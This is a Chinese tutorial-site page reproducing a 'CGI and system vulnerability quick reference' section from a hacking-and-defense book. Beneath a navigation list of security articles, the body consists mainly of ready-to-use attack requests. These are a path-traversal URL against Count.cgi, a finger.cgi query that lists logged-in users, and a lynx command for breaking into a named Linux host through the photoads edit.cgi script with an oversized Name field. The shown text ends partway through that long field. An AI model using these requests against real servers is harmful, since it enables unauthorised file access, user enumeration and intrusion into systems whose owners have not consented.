当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客攻防技术内幕-安全防入侵与防病毒基础(11)

安全基础
常见木马和未授权控制软件的关闭(1)
常见木马和未授权控制软件的关闭(2)
常见木马和未授权控制软件的关闭(3)
端口碰撞技术让开放端口更安全
利用传感器监测服务器机房
浅谈网络服务器安全维护技巧
DNS缓冲区毒害攻击频发微软开出解毒秘方
四个步骤加强网络防护(1)
四个步骤加强网络防护(2)
让路由器远离字典DoS攻击
打造安全个人电脑二十招秘技(1)
打造安全个人电脑二十招秘技(2)
防止黑客鉴别你的操作系统
关于DDoS攻击的趋势与防御
阻止攻击者对Windows注册表的远程访问
防止全局钩子的入侵
Win 2000系统安全隐患与防范(1)
Win 2000系统安全隐患与防范(2)
qq自动传文件病毒变种分析(1)
qq自动传文件病毒变种分析(2)

安全基础 中的 黑客攻防技术内幕-安全防入侵与防病毒基础(11)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 105 ::
收藏到网摘: n/a

3.5 CGI及系统漏洞速查(2)

    

Count.cgi看图片:

http://server/cgi-bin/Count.cgi?display=image&image=../../../../../../path_to_gif/file.gif

finger.cgi

lynx http://www.server/cgi-bin/finger?@localhost

得到主机上登录的用户名。

JFS

漏洞介绍:利用photoads这个CGI模块攻入主机,可以入侵PCWEEK-LINUX 主机,具体如下:

lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?AdNum=31337&action=done&Country=lala&City=lele&State=a&[email protected]&Name= 11111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111